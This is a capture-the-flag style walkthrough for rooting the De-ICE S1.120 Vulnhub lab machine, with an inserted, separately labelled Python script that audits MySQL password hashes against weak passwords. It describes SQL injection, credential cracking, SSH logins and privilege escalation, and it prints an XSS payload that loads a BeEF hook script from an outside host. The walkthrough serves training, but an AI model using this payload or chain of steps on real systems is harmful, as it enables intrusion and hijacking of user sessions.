Pen-testing: De-ICE: S1.120 Walkthrough — Vulnhub

The following is a walkthrough of the De-ICE: S1.120 vulnhub VM. This is a fairly easy machine to root, so it's suitable for beginners.


Reconnaissance

First of all, let’s ping sweep the network to find our target:

Now let’s portscan the target:

The target exposes several services: FTP, SSH, HTTP, HTTPS and MySQL. We can assume there's a website, probably serving some files and backed by the MySQL database. Let's now inspect the service versions:

Summary of the intel gathered:

MAC = 08:00:27:FF:EB:3E
IP = 192.168.1.120
OS = Linux 2.6.X
Services:
21:ftp = ProFTPD 1.3.2
22:ssh = OpenSSH 5.1
80:http = Apache httpd 2.2.11 - PHP 5.2.9
443:https = Apache httpd 2.2.11 - PHP 5.2.9
3306:mysql = MySQL

Now let’s go through the services and see what we can do with them…

FTP

A quick read through ProFTPD's documentation on the official site reveals that default credentials for anonymous connections are enabled by default. Let's try this first:

There's nothing interesting here, so it's time to move on.

HTTP/HTTPS

Let’s see what the website is about:

After inspecting the requests manually, I detect some possible injection points for SQLi and XSS. I decide to test the product search request first using sqlmap and find that the 'id' parameter of the search is injectable:

Once the injection point is found, exploiting the vulnerability with sqlmap is trivial. I first extract the list of database tables to get an idea of which ones to dump first:

Then I go after the table ‘user’:

Now that I have all the users and their corresponding password hashes, the next step is to try cracking them in order to gain access to the system. After identifying the hash type, which turned out to be MySQL's default, I use sqlmap's integrated hash-cracking option to get the plaintext credentials:

[Screenshot: raining passwords]
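The hash identification step above can be reproduced and turned into a defensive check. The script below is an added example, not part of the original writeup: it recognises MySQL's native 4.1+ hash format by prefix and length, recomputes that hash for a constructed list of weak passwords, and flags accounts whose stored hash matches, so a DBA can find weak credentials before someone else does. The sample user rows, the wordlist and the helper names are all constructed for this example.

```python
import hashlib
import re

# Constructed sample rows shaped like a dumped MySQL `user` table (not the VM's real data).
SAMPLE_ROWS = [
    ("alice", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),  # PASSWORD('password')
    ("bob", "*" + "F" * 40),                                  # constructed; matches nothing
    ("carol", "6f8c114b58f2ce9e"),                            # constructed pre-4.1 16-hex hash
]
# Constructed weak-password list; a real audit would use a proper wordlist.
WEAK_PASSWORDS = ["123456", "password", "letmein", "qwerty"]

NATIVE_RE = re.compile(r"^\*[0-9A-F]{40}$")  # mysql_native_password (MySQL 4.1+)
OLD_RE = re.compile(r"^[0-9a-f]{16}$")       # legacy pre-4.1 format

def identify_mysql_hash(stored: str) -> str:
    """Classify a stored hash the way an analyst does by eye: prefix and length."""
    if NATIVE_RE.match(stored):
        return "mysql-native"
    if OLD_RE.match(stored):
        return "mysql-old"
    return "unknown"

def mysql_native_hash(password: str) -> str:
    """Reproduce MySQL's PASSWORD(): '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def audit_weak_passwords(rows, wordlist):
    """Return ({user: weak_password}, [(user, kind)]) for matched and unchecked hashes."""
    # Hash the wordlist once and look stored hashes up, instead of hashing per user.
    lookup = {mysql_native_hash(pw): pw for pw in wordlist}
    weak, unchecked = {}, []
    for user, stored in rows:
        kind = identify_mysql_hash(stored)
        if kind != "mysql-native":
            unchecked.append((user, kind))  # legacy/unknown formats need another tool
        elif stored in lookup:
            weak[user] = lookup[stored]
    return weak, unchecked

if __name__ == "__main__":
    weak, unchecked = audit_weak_passwords(SAMPLE_ROWS, WEAK_PASSWORDS)
    for user, pw in weak.items():
        print(f"{user}: password {pw!r} is in the weak list; force a reset")
    for user, kind in unchecked:
        print(f"{user}: hash format {kind!r} not checked")
```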

SSH

Right after finding valid credentials, the natural next step is to test them over SSH to see if we have access to the box. I used hydra to try every combination:

[Screenshot: raining logins]

All 48 credentials found are valid over SSH. Now the questions are: what type of privileges do they have? Is there a root account among them? How can we elevate privileges if none of them have admin privileges? I first try a couple of logins to see what kind of access the users have:

After some trial and error, I find that the user named 'coffee' has access to an executable file that looks interesting:

[Screenshot: getlogs.sh]

getlogs.sh can be executed as root, and we can modify the file and overwrite its contents to serve our purpose of escalating privileges. To test whether this works, I try running the 'id' command. Then, seeing that it works, I change the command to spawn a shell as root, granting me full access:

Now, regardless of having achieved the goal, I test one more thing:

XSS

I mentioned earlier that I found a possible XSS injection point, so I decided to test it anyway to see the results:

Both fields turned out to be vulnerable:

To exploit this in a more significant way, I added a hook to a BeEF server on my local machine using the payload:

<script src=192.168.1.4/h.js></script>

And I got the browser hooked as expected:

Using this, an attacker could potentially access the users' cookies, perform phishing attacks, man-in-the-browser (MITB) attacks, scan the network from there, and much more. Even though this vulnerability did not give me root access to the box, it can be very dangerous for the users and can lead to the exploitation of other issues present on their machines.

And that's all. Hope you liked this writeup, and see you around!


Written by syscall59 (Alan Vivona)

Shellcode for the masses

Twitter: @syscall59 | medium.syscall59.com | syscall59@protonmail.com
